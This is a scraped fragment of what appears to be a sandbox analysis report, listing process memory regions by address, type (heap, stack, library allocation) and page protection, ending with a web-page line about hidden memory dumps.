|
trusted library allocation
|
page read and write
|
||
1B0AB12E000
|
heap
|
page read and write
|
||
216A0521000
|
trusted library allocation
|
page read and write
|
||
216B86E4000
|
heap
|
page read and write
|
||
7FF816530000
|
trusted library allocation
|
page read and write
|
||
7FF816330000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
7FF816570000
|
trusted library allocation
|
page read and write
|
||
7FF8164F7000
|
trusted library allocation
|
page read and write
|
||
216B8713000
|
heap
|
page read and write
|
||
18EBCF000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF81642D000
|
trusted library allocation
|
page read and write
|
||
7FF81632C000
|
trusted library allocation
|
page execute and read and write
|
||
1B090950000
|
remote allocation
|
page read and write
|
||
1B0AAB83000
|
trusted library allocation
|
page read and write
|
||
1B0A2A11000
|
trusted library allocation
|
page read and write
|
||
7FF816460000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAD1D000
|
heap
|
page read and write
|
||
1B0AAB92000
|
trusted library allocation
|
page read and write
|
||
7FF816273000
|
trusted library allocation
|
page execute and read and write
|
||
1B093DBA000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
238CBC10000
|
heap
|
page read and write
|
||
1B092A00000
|
heap
|
page execute and read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
7FF816510000
|
trusted library allocation
|
page read and write
|
||
7FF816560000
|
trusted library allocation
|
page read and write
|
||
2169E6E3000
|
heap
|
page read and write
|
||
1B093FD6000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF8165B0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
2169E685000
|
heap
|
page read and write
|
||
216B86E4000
|
heap
|
page read and write
|
||
238CBDC7000
|
heap
|
page read and write
|
||
1B090B36000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
F185BFF000
|
stack
|
page read and write
|
||
216B86AE000
|
heap
|
page read and write
|
||
15CFEF13000
|
heap
|
page read and write
|
||
238CBDC3000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
216B871A000
|
heap
|
page read and write
|
||
1B0A2CEA000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
216A055A000
|
trusted library allocation
|
page read and write
|
||
F1855F5000
|
stack
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
18EF7B000
|
stack
|
page read and write
|
||
216B8717000
|
heap
|
page read and write
|
||
18F177000
|
stack
|
page read and write
|
||
238CBB83000
|
heap
|
page read and write
|
||
1B090BF0000
|
trusted library allocation
|
page read and write
|
||
216A0541000
|
trusted library allocation
|
page read and write
|
||
7FF816350000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AAD2A000
|
heap
|
page read and write
|
||
216B8610000
|
heap
|
page execute and read and write
|
||
7FF8164E0000
|
trusted library allocation
|
page read and write
|
||
1B090B34000
|
heap
|
page read and write
|
||
238C9E32000
|
heap
|
page read and write
|
||
238CC0DA000
|
heap
|
page read and write
|
||
1B092760000
|
trusted library allocation
|
page read and write
|
||
1B093DBC000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
216B8830000
|
trusted library allocation
|
page read and write
|
||
216A0521000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
216B86F7000
|
heap
|
page read and write
|
||
238CBE10000
|
heap
|
page read and write
|
||
1B0AABA2000
|
trusted library allocation
|
page read and write
|
||
216B86D2000
|
heap
|
page read and write
|
||
2169E713000
|
heap
|
page read and write
|
||
2169E795000
|
heap
|
page read and write
|
||
1B0A2BA7000
|
trusted library allocation
|
page read and write
|
||
216B8681000
|
heap
|
page read and write
|
||
1B0AAD2A000
|
heap
|
page read and write
|
||
1B0AB138000
|
heap
|
page read and write
|
||
7FF816421000
|
trusted library allocation
|
page read and write
|
||
7FF8164C0000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B092830000
|
trusted library allocation
|
page read and write
|
||
216B05A0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB97000
|
trusted library allocation
|
page read and write
|
||
7FF816550000
|
trusted library allocation
|
page read and write
|
||
F185EBE000
|
stack
|
page read and write
|
||
1B0AB095000
|
heap
|
page read and write
|
||
1B090AB0000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
303873B000
|
stack
|
page read and write
|
||
7FF8164B0000
|
trusted library allocation
|
page read and write
|
||
7FF8164E0000
|
trusted library allocation
|
page read and write
|
||
216B85D0000
|
heap
|
page read and write
|
||
7FF8163B0000
|
trusted library allocation
|
page execute and read and write
|
||
238C9E20000
|
heap
|
page read and write
|
||
1B090AF4000
|
heap
|
page read and write
|
||
238CBDF0000
|
heap
|
page read and write
|
||
1B0A2BB2000
|
trusted library allocation
|
page read and write
|
||
2169E670000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAD70000
|
heap
|
page read and write
|
||
7FF8165F0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB85000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
238CBB97000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816390000
|
trusted library allocation
|
page execute and read and write
|
||
D1592FF000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
15CFEE59000
|
heap
|
page read and write
|
||
7FF816356000
|
trusted library allocation
|
page execute and read and write
|
||
216B86DB000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
2169E630000
|
heap
|
page read and write
|
||
F185CBF000
|
stack
|
page read and write
|
||
216A0500000
|
heap
|
page execute and read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAB9B000
|
trusted library allocation
|
page read and write
|
||
7FF816462000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
trusted library allocation
|
page read and write
|
||
238CBEC0000
|
heap
|
page read and write
|
||
F18597F000
|
stack
|
page read and write
|
||
30380FD000
|
stack
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
238CBB9A000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
238CC053000
|
heap
|
page read and write
|
||
7FF816274000
|
trusted library allocation
|
page read and write
|
||
30385BF000
|
stack
|
page read and write
|
||
1B0AAD1A000
|
heap
|
page read and write
|
||
1B0AB040000
|
heap
|
page read and write
|
||
1B092A65000
|
trusted library allocation
|
page read and write
|
||
2169E4A0000
|
heap
|
page read and write
|
||
238CBDC2000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
216B0550000
|
trusted library allocation
|
page read and write
|
||
1B0AAB89000
|
trusted library allocation
|
page read and write
|
||
238CC17C000
|
heap
|
page read and write
|
||
D158FFE000
|
stack
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AB068000
|
heap
|
page read and write
|
||
1B092AB2000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
30383B7000
|
stack
|
page read and write
|
||
216B8830000
|
trusted library allocation
|
page read and write
|
||
2169E72D000
|
heap
|
page read and write
|
||
238C9E5D000
|
heap
|
page read and write
|
||
216B8620000
|
heap
|
page read and write
|
||
238CBBA3000
|
heap
|
page read and write
|
||
1B0AB09F000
|
heap
|
page read and write
|
||
15CFEE81000
|
heap
|
page read and write
|
||
1B0AAD5A000
|
heap
|
page read and write
|
||
1B0AB0F9000
|
heap
|
page read and write
|
||
1B0AB0CF000
|
heap
|
page read and write
|
||
1B092861000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
238C9EFC000
|
heap
|
page read and write
|
||
1B0AAD26000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AAB82000
|
trusted library allocation
|
page read and write
|
||
216A0882000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AAB89000
|
trusted library allocation
|
page read and write
|
||
1B0AB076000
|
heap
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AAB8C000
|
trusted library allocation
|
page read and write
|
||
1B090A30000
|
heap
|
page read and write
|
||
1B0AB11F000
|
heap
|
page read and write
|
||
216A0983000
|
trusted library allocation
|
page read and write
|
||
216A07E4000
|
trusted library allocation
|
page read and write
|
||
238C9DE0000
|
heap
|
page read and write
|
||
7FF816570000
|
trusted library allocation
|
page read and write
|
||
D1597FE000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
216B871E000
|
heap
|
page read and write
|
||
216A0980000
|
trusted library allocation
|
page read and write
|
||
216A0965000
|
trusted library allocation
|
page read and write
|
||
7FF816520000
|
trusted library allocation
|
page read and write
|
||
1B090AEE000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
15CFEE13000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
238CC0C1000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216B86AC000
|
heap
|
page read and write
|
||
7FF816470000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AAB86000
|
trusted library allocation
|
page read and write
|
||
1B092834000
|
trusted library allocation
|
page read and write
|
||
1B0AAD4E000
|
heap
|
page read and write
|
||
2169E6D9000
|
heap
|
page read and write
|
||
7FF8164F0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816590000
|
trusted library allocation
|
page read and write
|
||
1B0AAD67000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B093FDE000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
15CFEF08000
|
heap
|
page read and write
|
||
1B0AAD0E000
|
heap
|
page read and write
|
There are 637 hidden memdumps, click here to show them.